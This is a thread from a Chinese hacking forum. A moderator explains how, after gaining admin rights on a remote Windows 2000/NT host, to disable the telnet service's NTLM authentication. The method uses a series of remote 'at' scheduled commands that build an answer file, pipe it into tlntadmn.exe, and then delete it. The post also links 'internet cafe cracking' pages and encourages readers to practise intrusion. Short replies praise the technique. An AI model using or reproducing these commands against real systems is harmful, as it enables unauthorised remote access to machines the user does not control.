|
 | 作者: abctm [abctm]
 版主 |
登录 |
| 一个在线地址 网吧破解:http://www.chinesehack.org/online/wangba.htm IE:http://www.chinesehack.org/online/change.htm 更经典的:http://www.chinesehack.org/online/other.htm 不需要任何工具,远程屏蔽telnet服务的ntlm认证 很多人获得上传文件的权限和管理员权限以后想启动远程的tlelnet服务,但是却碰到 讨厌的NTLM认证,对于这种情况,我们很多时候就采用上传文件(比如NTLM.exe),然后at远程定时执行,如果手头上没有这样的工具怎么办呢? 可以这么做: 大家可以看一下win2000和nt4自带tlntadmn这个命令,他是用来控制台修改telnet设置的,很可惜这是一个控制台的交互式工具,所以at命令没有办法直接调用。 现在我们执行一下tlntadmn,然后按照以下的顺序操作 停止服务(5)->更改设置(3)->NTLM(7)->确认更改(y)->修改NTLM当前值(0)->再次确认(y)->退出菜单(0)->启动服务(4)->退出程序(0) 现在大家记住了吧,先后顺序是5(回车)3(回车)7(回车)y(回车)0(回车)y(回车)0(回车)4(回车)0(回车) 线在我们这么做 at \\ip time "echo 5 > c:\t.txt" at \\ip time "echo 3 >> c:\t.txt" at \\ip time "echo 7 >> c:\t.txt" at \\ip time "echo y >> c:\t.txt" at \\ip time "echo 0 >> c:\t.txt" at \\ip time "echo y >> c:\t.txt" at \\ip time "echo 0 >> c:\t.txt" at \\ip time "echo 4 >> c:\t.txt" at \\ip time "echo 0 >> c:\t.txt" at \\ip time "c:\winnt\system32\tlntadmn.exe < c:\t.txt" at \\ip time "del c:\t.txt /f" 呵呵按照上面的顺序一步一步执行 当然你本地做一个t.txt文件也可以,内容如下: 5 3 7 y 0 y 0 4 0 每个字符后面要加回车,然后copy t.txt \\ip\c$ 然后再 at \\ip time "c:\winnt\system32\tlntadmn.exe < c:\t.txt" at \\ip time "del c:\t.txt /f" 很简单的dos重定向原理,t.txt就相当于手工输入一系列的操作,完成tlntadmn的交互 呵呵 当然,你们可以在本地试验好以后再发到远程主机去 我但是劝大家练习入侵的时候尽量不要使用工具,这样对自己没有帮助的 [此贴被 日月双星(abctm) 在 11月05日22时26分 编辑过] [此贴被 日月双星(abctm) 在 11月09日13时59分 编辑过] |
| 地主 发表时间: 11/05 22:36 |
| 回复: abctm [abctm] 版主 |
登录 |
|
??? |
| B1层 发表时间: 11/05 22:54 |
| 回复: abctm [abctm] 版主 |
登录 |
|
不需要任何工具,远程屏蔽telnet服务的ntlm认证 |
| B2层 发表时间: 11/09 13:00 |
 | 回复: hwarhead [hwarhead]  论坛用户 |
登录 |
|
8错,怎么没人顶啊? |
| B3层 发表时间: 11/09 18:01 |
 | 回复: hcz [hcz]  论坛用户 |
登录 |
|
如果能行对我这样的菜鸟确实很不错 |
| B4层 发表时间: 11/10 10:20 |
| 回复: abctm [abctm] 版主 |
登录 |
|
哦,那就好 |
| B5层 发表时间: 11/10 22:43 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 不需要任何工具,远程屏蔽telnet服务的ntlm认证